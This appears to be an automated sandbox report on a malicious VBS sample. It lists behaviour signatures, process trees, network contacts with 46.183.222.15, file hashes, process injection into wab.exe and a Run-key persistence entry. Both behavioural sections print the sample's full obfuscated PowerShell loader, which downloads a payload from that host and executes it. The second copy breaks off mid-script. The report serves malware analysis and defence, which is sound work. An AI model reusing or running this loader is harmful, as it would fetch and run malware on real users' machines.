Malware Analysis Report

2025-03-15 01:15

Sample ID 240614-cktssavgjq
Target f2061ea9095fd5505fd3812502961c20f5c32b3452b35450728a9f3e0bdbae4e.vbs
SHA256 f2061ea9095fd5505fd3812502961c20f5c32b3452b35450728a9f3e0bdbae4e
Tags
persistence
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

f2061ea9095fd5505fd3812502961c20f5c32b3452b35450728a9f3e0bdbae4e

Threat Level: Likely malicious

The file f2061ea9095fd5505fd3812502961c20f5c32b3452b35450728a9f3e0bdbae4e.vbs was found to be: Likely malicious.

Malicious Activity Summary

persistence

Blocklisted process makes network request

Adds policy Run key to start application

Checks computer location settings

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious behavior: MapViewOfSection

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-14 02:08

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-14 02:08

Reported

2024-06-14 02:11

Platform

win10v2004-20240508-en

Max time kernel

147s

Max time network

150s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f2061ea9095fd5505fd3812502961c20f5c32b3452b35450728a9f3e0bdbae4e.vbs"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f2061ea9095fd5505fd3812502961c20f5c32b3452b35450728a9f3e0bdbae4e.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Signe = 1;$Variabeltypes='ring';Function Filbetegnelse($Wadmels){$Sunsquall=$Wadmels.Length-$Signe;$Untailorlike='Subst'+$Variabeltypes;For( $Anaspalin=7;$Anaspalin -lt $Sunsquall;$Anaspalin+=8){$Gruttende+=$Wadmels.$Untailorlike.Invoke( $Anaspalin, $Signe);}$Gruttende;}function Valgmenighedernes($Manendes){ & ($illegalisation) ($Manendes);}$Gamasoidea=Filbetegnelse ' BabyinMJulekaloMelanchzGrou.dwiSparkpalCreptvilorpinsea Truing/Killock5Lejligh.Sekret,0Forsan, Bundga(Pul,onaWCra stviFolketinProlo,ud TyllefoHencemiw Formods Resume GenbesNSikk,rhT equiva Spystil1Decenni0,nteral.Un,esto0 Minisu;Sme.tep Pa.amanWI.doktri Stereon Sigted6Tavlesv4 notabi;Ostiate SulfofxMetabas6 rotect4Kransst;Rebokes parkgstrDrtrsklv Rrlgn :Sub,oen1Sk leel2Ovarier1 Grynte.Me,oria0Fo budd)Stan se hede skGFlonelleGammeljcCursivekEpicardoRecubat/Fanwort2Unrejec0Genrebe1Recani.0 Adspl.0Cubicit1Sanitor0Var.fys1 M zuza UnpervaFgr.mmatiRet krarForageseTrafi.ofDynamogo WhizzbxOmplace/Monticu1Avlsbru2Enla es1 Villia.Whitten0 Forjag ';$Scirrhus=Filbetegnelse 'SygesikUBr ddensurigt geGovernar iffere- D variAFo.efalg DebatpeMa.ropln Coelint ,ntikv ';$Waxingly=Filbetegnelse 'BagflikhBassangtTeskeretAktio.ipGe,give:egisrut/ bil ag/Bra.ker4Zeuneri6Papolat.Floskle1 Mis,ai8Setdown3 Beskik.Bi.ulfa2Harmoni2Fla,ell2Ensilat. Treeta1hissing5Usan sy/ MellemGGgeblomlGlobulia,ntermidGallo.alTohaandiAnatomoeVandskisSalsalatReboote.Paterepj GoldesaOcul,pavDivulsoaBulletw ';$Forduftede71=Filbetegnelse 'Ndersun> Beastl ';$illegalisation=Filbetegnelse 'Glostsdi ShyesseIndtgtsxMasedem ';$Determinacy='Indiapapir132';$Heteroclital = Filbetegnelse 'SkitsereRokni gc AliyoshProag,ioPhotofl Kle,tom% KrydsoaFlisevgpSnitsa p JewishdLand,seaB.nepsytUnreproaUdskeje% Fi,kes\Blr.rneS,rudgincCompursh M.lleme Modi,in TronadkSkattefeArsenoplM ldirevKe,nespiPinc.gug unportnAkupunki Redninn Unassig margu.eFloodprrWo.derfsPoxycot.afhoertsSkorzonaBakterimHightin Redacto&Unsatir&Partiti StavesveBeseglecHempsarhDemonstoRej ebe ViticultLt,tleb ';Valgmenighedernes (Filbetegnelse 'Tomor,o$FredningEventualOffend oErratasb Dg,insaLividitl L.eadg: PersonATipoldelSemid clKimcheeiSprightgBobbingaSss.nsttGoat,ruiVaud uxole.terlnHemmeli=Trylles(Radialgc Skuffem Mult,cd Frustr L cubra/ Tils,ecForskel Lnst.pp$ St.rneHSpydigseF renootBrem.ereTruthler .efereoLanguedc GazumplPreach iGittknitParticia Devexil Udsti )Udmejsl ');Valgmenighedernes (Filbetegnelse 'Brkjern$Pre.mblgHaandfll TistykoGonorrsbForna naIn estalIndus r: PeriphS Erodera IntercmMerostom.rfrieweAlderdonAzoficatBrandflrSystylonJordfstgRopelaynMcadam,isway,ulnVoltit.g UnbruteAl uderr Infini2Tilhold4.ortsta0Reh.ars=Vendue $BeregniWNoninc aPortionxRikardsi WeddednBu banegclawkphlTwan edyBrnevre.CoagitasDmpendep HyperdlBanuseliPl,vskrtThirtyp(Formueo$QuizsmoFkaffessoAutori rRefer idLampmanuCont,mafPar eretJordlageStandpadP lariseSy boli7Patter 1M,neant)Skubspy ');$Waxingly=$Sammentrngninger240[0];$Civilness= (Filbetegnelse 'Neakesm$Meallesg Chat ll Forl.goIsopetabHy.omoraOsteostlLaanets:NattevaINaboerslAnneroddEnecellsUnmedialBoothagu Ri gvrkTeknonyn tigmatiUnfo benEkspansgIni.uitsR,imunda.everanpBra.dhjpLatiniaaTallagervddendeaAbstinet RegioneNulletst I tercsBu.lies=Oprej,nNM mickeeTusindewRallyet-handelsOU evgelb UnflesjvemodigeCord,tecReveriftNeumann UnbendSSomniloyForken.sDidaktitBlondineHaandfumMilie,p. DobbelNKantte,eSaloonetSlilydi.TrademyW Bank,pe Ynke sbBengtenCAxonicdl utterei Poperie AmputenP eonast');$Civilness+=$Alligation[1];Valgmenighedernes ($Civilness);Valgmenighedernes (Filbetegnelse 'Unpriva$MontgolIShlumpslSingle,dUdlic,tsEdmaszel Gr tinuun,oodfkPragmatnKalced.iPapercunNona.sogBrostensDannebraI.trigepKarnevapQuantisa .ktieur D filaaTeks,edtSk tteae Internt traales Papaen.Snder,eHne,hinie Trans aTabtypedFo.mingeRoachlirAuto.obsandroph[Oplg.in$TllingeSsvrms hcEk portiUnderclrDagsprirFlejnskhTra.situSlaskedsFiskesk]Dampkog=Lam,yma$AdenytaGT.icopha.ontingm rytte.a UdvalgsAllerhjoDirtiediKbstderdStringheSt,eameaSlgtled ');$Quittances=Filbetegnelse 'Exc mmu$ lausenIGnaversltambacsd SprogssEricophlDr.lageuT.bulark Abjuncn,rooneriClubablnekspresgUntimorsB,ookliaAl,alimpUrticatpInddataaReskomprSmaavasaSkalottt Saarske Polarit TamtamsYderlig.LumredeDBrownmooAppare.wKateternAfterpilPickeltoSparttiaArseniodPalaeoeFSupersoiSoamuntl esponseMadopsk( Tennis$ attigfWAfsi,diaEc.asitxBleskudiFeltflanRecirclgSull,abl Evako.y Tropho,Conjuga$P,ioritTNode laoafregneeDeliriejCrenothllammergeMi lion)Udkastn ';$Toejle=$Alligation[0];Valgmenighedernes (Filbetegnelse 'Succurs$.epskong inealelBokseboo MastmabGliadinaJannichl .kumme:Energ bAKejtedea S.ltegn rintpddeburghsPersonraErhvervrD agemoiTungstesUncapertSu,eredo ChoanokKunstudrDatabasa Easuret sdvanliStyrtdye GendrirAs.urgenChartereFormn.n=Trichot(uricoleTSedentaePyrewins LnovertSanglrk-HrmyredPBoksehaaGruppeat PreiothOphiob Creamc$UnlawmiTSabbyunoSuperc eGa,lamijbarratrlHan,skee Lvspri) Data,e ');while (!$Aandsaristokratierne) {Valgmenighedernes (Filbetegnelse 'Semipro$Ey opengHoodooblSkuboppo PaagribSki,bruaApartadlre eren:Hjlpev.rSalthoro PhantovSgnehelfGaloisfiUmbraensNonf sskOpryknieEbbingundecolors Sutteg=Gtemnds$myc.soztstillinr,nadipsuBarrelfe erhver ') ;Valgmenighedernes $Quittances;Valgmenighedernes (Filbetegnelse 'Abs rbeSperspectPresentaKi,engerKraverstcelebra-ByggeriSHaablstlElmyskre Dichroe O.erflp av,ntg Somme g4 Pla,fo ');Valgmenighedernes (Filbetegnelse 'forldel$Inh lergpr,tochlLabionaoCarburebUnaffliaSmedejeldannels:AcosmisA opklara CottifnUniv.rsdHovedstsFaci ita Rasherrwoo.ieriTricotpsDenicottImpervioelektrok TribelrGrevskaaLyseslutVermlaniStedtileKurdishrLa.ellunAdmiraleKiselsy=Heweudl(FourierTJeo.ordeFrekvensAnnlilstPlsebrd-FrdselsPSalgsseaLinguant Or,sgnhPers.nk Gennemh$SvornefTPutredio Mispere NotidajRaastofl AcyloxeFot.alb) mprovi ') ;Valgmenighedernes (Filbetegnelse 'Lsrepa $AssistegGalpendlPolerino.uarnerbRetsviraRu kusclOverste:MilksopPAltruissEscargoerollmopuFo.trffdIngenioo,ikronea Skumslnhe hrenarelaunccSlumarbhKvaliterTotalizoHaem,stn,ungmetiAs luslsSl erpatKlorofoifo.boldcS,repor=Voltmet$Sam.enrgSkrsildl martneoRegis.ebDesc ieaUove.enlBortlic:Glam.urR FremryiEkspartcAsylre.kResurresUntolerhNutr tiasem cos+Indkoms+Trespro%Estrich$MinkfarSSulfinea En eromRe setsmSymphoneNedskrinUlrikatt OverburSy svinn Damerkg PipiesnUn.ourniWhich,onStreg,ogProgra,eBordherrAutodyn2 A,ticy4Individ0Cinnamo.uopfyldcslutbe,oBagerisuSkoleelnudkaarit S bles ') ;$Waxingly=$Sammentrngninger240[$Pseudoanachronistic];}$Bifloderne=346851;$Privatundervisningers=30771;Valgmenighedernes (Filbetegnelse 'Koksbla$Ho.gastg PrdikalMos ismo Neda vbRomantiaLineocilAgitate:BitterbtArg,ntiiDowsabemBarakkea sa,dwiu Axi ymaSeemlie Workhov=Tjrenel Aksem gG.ilbageeBall.tatE.fases-Noi,efuCTabernaoArgentin,ordgtit,illemieBarnyv,nZanettetStrbemr graphic$bonitypTunittruo Unho,iePtocholjRygeo,tlTiresomeOpkalds ');Valgmenighedernes (Filbetegnelse ' Chilen$ SelfmagufordrvlPers.ecoGoyi.rvbDil,ttaaEta lerlrv,ulle:Quin,llDf,ooeycaUnsedestEfterfla Rusernb Overdra N,nintn tvnevak InverieLubberlrVoldgifn ForgreePre,ecl Hjkultu=beregni Side.me[Mora.isSzinckenyTribunesSussysttRaanokkeSpildevm blowha.AlliancCRudderhoUn erbynDeba.tevAlst upe,ommetarSk.iftrtBlodpla]fr.mpro:Psychom:MetrumsFdikuirerTrioicooTineweemDechlorBsubterhaPrimegisSupplereEdelwei6F.ttock4RdsptteSSul,hurtSnifferr VilligiDerbyernAnonymigColesee(asympto$Busbanet AmaryliAnischumM triaraSu,rounuGrund raPrototr)Minions ');Valgmenighedernes (Filbetegnelse ' Balakk$S rychng c emosl Guessto FedesvbDe,onstaSkriverl Leache:FiremasSChondran s.enarnGripep,iUnattackp,ramideSlumpssrBo deaunOve,cone larrig Cosmopo=Kuperin Pauseme[Udvlg,lS LandinyAfdampes evlerstYppigerePh,laenmKollegi. DeprogTPeriodee .urmulxAf,rkket Overb,.Crad.ecE GrousenGraf rncSmyrneaofylfotsdRob.tisiForgrunnMi faregEruptiv]Superst:carlish:F seforAAlfastrSI,kerquCsubtetaI Shark,ICraftin.TrappesGUn,appee slagmatNeoteriSPre.edet VonnierTank,gaiDiagnosnCloutingIndslag(Rhe,met$PromagiDConceptaBe.mysutOutjumpaG.cksrebnonpestaFl,ndernmiljbeskSkrigene Sal.onrPrins,sn ServieeHyposta) Platic ');Valgmenighedernes (Filbetegnelse ' K,nsta$ SvejtsgRinginelPrunabloMuskulrbU,produa Myc,lolRepatro:DesultoK Spr.ngbViolaqumleva,tka Ha.rrrnPh,laend Ove ineAdmin snKamgrss=Bugvgbl$FlokinsSUnputr nscruplenRevolutiFileredkChaunopeSt,laiprS umretnPrstindeIndkast. UnderfsPolydynuOpsamlib,hioanvs Kildret Nyttevr Cop odiDonatepnNurserygVi,flas(Acciden$StreptoBOwnnes.iSkattedfC bildol HydrogoDio trydUvilligeKimme,irGapeseenOverrepeSixtens, Se,ail$illegitPToucheerstegefei a.derivShipmenaFagbladtSkat etuSubchelnBelejr d.muletteBeskiknrFreetyevToldgrni BridecsSphenetn Femaari Rets.nnHabenalg DiphtheZinkkogrGradualsRehu.an),lasikk ');Valgmenighedernes $Kbmanden;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Schenkelvigningers.sam && echo t"

Network

Country Destination Domain Proto
LV 46.183.222.15:80 tcp
LV 46.183.222.15:80 tcp
LV 46.183.222.15:80 tcp
LV 46.183.222.15:80 tcp
LV 46.183.222.15:80 tcp
LV 46.183.222.15:80 tcp

Files

memory/3856-0-0x00007FF85A9B3000-0x00007FF85A9B5000-memory.dmp

memory/3856-1-0x000001A16AF40000-0x000001A16AF62000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sikjojhh.ufd.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3856-11-0x00007FF85A9B0000-0x00007FF85B471000-memory.dmp

memory/3856-12-0x00007FF85A9B0000-0x00007FF85B471000-memory.dmp

memory/3856-13-0x00007FF85A9B0000-0x00007FF85B471000-memory.dmp

memory/3856-14-0x00007FF85A9B0000-0x00007FF85B471000-memory.dmp

memory/3856-15-0x00007FF85A9B0000-0x00007FF85B471000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-14 02:08

Reported

2024-06-14 02:11

Platform

win7-20240611-en

Max time kernel

149s

Max time network

147s

Command Line

C:\Windows\Explorer.EXE

Signatures

Adds policy Run key to start application

persistence
Description Indicator Process Target
Key created \Registry\User\S-1-5-21-39690363-730359138-1046745555-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run C:\Windows\SysWOW64\extrac32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\IZILLDQXRHV = "C:\\Program Files (x86)\\windows mail\\wab.exe" C:\Windows\SysWOW64\extrac32.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3036 set thread context of 2396 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2396 set thread context of 1308 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\Explorer.EXE
PID 2396 set thread context of 1044 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\extrac32.exe
PID 1044 set thread context of 1308 N/A C:\Windows\SysWOW64\extrac32.exe C:\Windows\Explorer.EXE

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1968 wrote to memory of 2636 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1968 wrote to memory of 2636 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1968 wrote to memory of 2636 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2636 wrote to memory of 2516 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2636 wrote to memory of 2516 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2636 wrote to memory of 2516 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2636 wrote to memory of 3036 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2636 wrote to memory of 3036 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2636 wrote to memory of 3036 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2636 wrote to memory of 3036 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 3036 wrote to memory of 2476 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3036 wrote to memory of 2476 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3036 wrote to memory of 2476 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3036 wrote to memory of 2476 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3036 wrote to memory of 2396 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3036 wrote to memory of 2396 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3036 wrote to memory of 2396 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3036 wrote to memory of 2396 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3036 wrote to memory of 2396 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3036 wrote to memory of 2396 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1308 wrote to memory of 1044 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\extrac32.exe
PID 1308 wrote to memory of 1044 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\extrac32.exe
PID 1308 wrote to memory of 1044 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\extrac32.exe
PID 1308 wrote to memory of 1044 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\extrac32.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f2061ea9095fd5505fd3812502961c20f5c32b3452b35450728a9f3e0bdbae4e.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Signe = 1;$Variabeltypes='ring';Function Filbetegnelse($Wadmels){$Sunsquall=$Wadmels.Length-$Signe;$Untailorlike='Subst'+$Variabeltypes;For( $Anaspalin=7;$Anaspalin -lt $Sunsquall;$Anaspalin+=8){$Gruttende+=$Wadmels.$Untailorlike.Invoke( $Anaspalin, $Signe);}$Gruttende;}function Valgmenighedernes($Manendes){ & ($illegalisation) ($Manendes);}$Gamasoidea=Filbetegnelse ' BabyinMJulekaloMelanchzGrou.dwiSparkpalCreptvilorpinsea Truing/Killock5Lejligh.Sekret,0Forsan, Bundga(Pul,onaWCra stviFolketinProlo,ud TyllefoHencemiw Formods Resume GenbesNSikk,rhT equiva Spystil1Decenni0,nteral.Un,esto0 Minisu;Sme.tep Pa.amanWI.doktri Stereon Sigted6Tavlesv4 notabi;Ostiate SulfofxMetabas6 rotect4Kransst;Rebokes parkgstrDrtrsklv Rrlgn :Sub,oen1Sk leel2Ovarier1 Grynte.Me,oria0Fo budd)Stan se hede skGFlonelleGammeljcCursivekEpicardoRecubat/Fanwort2Unrejec0Genrebe1Recani.0 Adspl.0Cubicit1Sanitor0Var.fys1 M zuza UnpervaFgr.mmatiRet krarForageseTrafi.ofDynamogo WhizzbxOmplace/Monticu1Avlsbru2Enla es1 Villia.Whitten0 Forjag ';$Scirrhus=Filbetegnelse 'SygesikUBr ddensurigt geGovernar iffere- D variAFo.efalg DebatpeMa.ropln Coelint ,ntikv ';$Waxingly=Filbetegnelse 'BagflikhBassangtTeskeretAktio.ipGe,give:egisrut/ bil ag/Bra.ker4Zeuneri6Papolat.Floskle1 Mis,ai8Setdown3 Beskik.Bi.ulfa2Harmoni2Fla,ell2Ensilat. Treeta1hissing5Usan sy/ MellemGGgeblomlGlobulia,ntermidGallo.alTohaandiAnatomoeVandskisSalsalatReboote.Paterepj GoldesaOcul,pavDivulsoaBulletw ';$Forduftede71=Filbetegnelse 'Ndersun> Beastl ';$illegalisation=Filbetegnelse 'Glostsdi ShyesseIndtgtsxMasedem ';$Determinacy='Indiapapir132';$Heteroclital = Filbetegnelse 'SkitsereRokni gc AliyoshProag,ioPhotofl Kle,tom% KrydsoaFlisevgpSnitsa p JewishdLand,seaB.nepsytUnreproaUdskeje% Fi,kes\Blr.rneS,rudgincCompursh M.lleme Modi,in TronadkSkattefeArsenoplM ldirevKe,nespiPinc.gug unportnAkupunki Redninn Unassig margu.eFloodprrWo.derfsPoxycot.afhoertsSkorzonaBakterimHightin Redacto&Unsatir&Partiti StavesveBeseglecHempsarhDemonstoRej ebe ViticultLt,tleb ';Valgmenighedernes (Filbetegnelse 'Tomor,o$FredningEventualOffend oErratasb Dg,insaLividitl L.eadg: PersonATipoldelSemid clKimcheeiSprightgBobbingaSss.nsttGoat,ruiVaud uxole.terlnHemmeli=Trylles(Radialgc Skuffem Mult,cd Frustr L cubra/ Tils,ecForskel Lnst.pp$ St.rneHSpydigseF renootBrem.ereTruthler .efereoLanguedc GazumplPreach iGittknitParticia Devexil Udsti )Udmejsl ');Valgmenighedernes (Filbetegnelse 'Brkjern$Pre.mblgHaandfll TistykoGonorrsbForna naIn estalIndus r: PeriphS Erodera IntercmMerostom.rfrieweAlderdonAzoficatBrandflrSystylonJordfstgRopelaynMcadam,isway,ulnVoltit.g UnbruteAl uderr Infini2Tilhold4.ortsta0Reh.ars=Vendue $BeregniWNoninc aPortionxRikardsi WeddednBu banegclawkphlTwan edyBrnevre.CoagitasDmpendep HyperdlBanuseliPl,vskrtThirtyp(Formueo$QuizsmoFkaffessoAutori rRefer idLampmanuCont,mafPar eretJordlageStandpadP lariseSy boli7Patter 1M,neant)Skubspy ');$Waxingly=$Sammentrngninger240[0];$Civilness= (Filbetegnelse 'Neakesm$Meallesg Chat ll Forl.goIsopetabHy.omoraOsteostlLaanets:NattevaINaboerslAnneroddEnecellsUnmedialBoothagu Ri gvrkTeknonyn tigmatiUnfo benEkspansgIni.uitsR,imunda.everanpBra.dhjpLatiniaaTallagervddendeaAbstinet RegioneNulletst I tercsBu.lies=Oprej,nNM mickeeTusindewRallyet-handelsOU evgelb UnflesjvemodigeCord,tecReveriftNeumann UnbendSSomniloyForken.sDidaktitBlondineHaandfumMilie,p. DobbelNKantte,eSaloonetSlilydi.TrademyW Bank,pe Ynke sbBengtenCAxonicdl utterei Poperie AmputenP eonast');$Civilness+=$Alligation[1];Valgmenighedernes ($Civilness);Valgmenighedernes (Filbetegnelse 'Unpriva$MontgolIShlumpslSingle,dUdlic,tsEdmaszel Gr tinuun,oodfkPragmatnKalced.iPapercunNona.sogBrostensDannebraI.trigepKarnevapQuantisa .ktieur D filaaTeks,edtSk tteae Internt traales Papaen.Snder,eHne,hinie Trans aTabtypedFo.mingeRoachlirAuto.obsandroph[Oplg.in$TllingeSsvrms hcEk portiUnderclrDagsprirFlejnskhTra.situSlaskedsFiskesk]Dampkog=Lam,yma$AdenytaGT.icopha.ontingm rytte.a UdvalgsAllerhjoDirtiediKbstderdStringheSt,eameaSlgtled ');$Quittances=Filbetegnelse 'Exc mmu$ lausenIGnaversltambacsd SprogssEricophlDr.lageuT.bulark Abjuncn,rooneriClubablnekspresgUntimorsB,ookliaAl,alimpUrticatpInddataaReskomprSmaavasaSkalottt Saarske Polarit TamtamsYderlig.LumredeDBrownmooAppare.wKateternAfterpilPickeltoSparttiaArseniodPalaeoeFSupersoiSoamuntl esponseMadopsk( Tennis$ attigfWAfsi,diaEc.asitxBleskudiFeltflanRecirclgSull,abl Evako.y Tropho,Conjuga$P,ioritTNode laoafregneeDeliriejCrenothllammergeMi lion)Udkastn ';$Toejle=$Alligation[0];Valgmenighedernes (Filbetegnelse 'Succurs$.epskong inealelBokseboo MastmabGliadinaJannichl .kumme:Energ bAKejtedea S.ltegn rintpddeburghsPersonraErhvervrD agemoiTungstesUncapertSu,eredo ChoanokKunstudrDatabasa Easuret sdvanliStyrtdye GendrirAs.urgenChartereFormn.n=Trichot(uricoleTSedentaePyrewins LnovertSanglrk-HrmyredPBoksehaaGruppeat PreiothOphiob Creamc$UnlawmiTSabbyunoSuperc eGa,lamijbarratrlHan,skee Lvspri) Data,e ');while (!$Aandsaristokratierne) {Valgmenighedernes (Filbetegnelse 'Semipro$Ey opengHoodooblSkuboppo PaagribSki,bruaApartadlre eren:Hjlpev.rSalthoro PhantovSgnehelfGaloisfiUmbraensNonf sskOpryknieEbbingundecolors Sutteg=Gtemnds$myc.soztstillinr,nadipsuBarrelfe erhver ') ;Valgmenighedernes $Quittances;Valgmenighedernes (Filbetegnelse 'Abs rbeSperspectPresentaKi,engerKraverstcelebra-ByggeriSHaablstlElmyskre Dichroe O.erflp av,ntg Somme g4 Pla,fo ');Valgmenighedernes (Filbetegnelse 'forldel$Inh lergpr,tochlLabionaoCarburebUnaffliaSmedejeldannels:AcosmisA opklara CottifnUniv.rsdHovedstsFaci ita Rasherrwoo.ieriTricotpsDenicottImpervioelektrok TribelrGrevskaaLyseslutVermlaniStedtileKurdishrLa.ellunAdmiraleKiselsy=Heweudl(FourierTJeo.ordeFrekvensAnnlilstPlsebrd-FrdselsPSalgsseaLinguant Or,sgnhPers.nk Gennemh$SvornefTPutredio Mispere NotidajRaastofl AcyloxeFot.alb) mprovi ') ;Valgmenighedernes (Filbetegnelse 'Lsrepa $AssistegGalpendlPolerino.uarnerbRetsviraRu kusclOverste:MilksopPAltruissEscargoerollmopuFo.trffdIngenioo,ikronea Skumslnhe hrenarelaunccSlumarbhKvaliterTotalizoHaem,stn,ungmetiAs luslsSl erpatKlorofoifo.boldcS,repor=Voltmet$Sam.enrgSkrsildl martneoRegis.ebDesc ieaUove.enlBortlic:Glam.urR FremryiEkspartcAsylre.kResurresUntolerhNutr tiasem cos+Indkoms+Trespro%Estrich$MinkfarSSulfinea En eromRe setsmSymphoneNedskrinUlrikatt OverburSy svinn Damerkg PipiesnUn.ourniWhich,onStreg,ogProgra,eBordherrAutodyn2 A,ticy4Individ0Cinnamo.uopfyldcslutbe,oBagerisuSkoleelnudkaarit S bles ') ;$Waxingly=$Sammentrngninger240[$Pseudoanachronistic];}$Bifloderne=346851;$Privatundervisningers=30771;Valgmenighedernes (Filbetegnelse 'Koksbla$Ho.gastg PrdikalMos ismo Neda vbRomantiaLineocilAgitate:BitterbtArg,ntiiDowsabemBarakkea sa,dwiu Axi ymaSeemlie Workhov=Tjrenel Aksem gG.ilbageeBall.tatE.fases-Noi,efuCTabernaoArgentin,ordgtit,illemieBarnyv,nZanettetStrbemr graphic$bonitypTunittruo Unho,iePtocholjRygeo,tlTiresomeOpkalds ');Valgmenighedernes (Filbetegnelse ' Chilen$ SelfmagufordrvlPers.ecoGoyi.rvbDil,ttaaEta lerlrv,ulle:Quin,llDf,ooeycaUnsedestEfterfla Rusernb Overdra N,nintn tvnevak 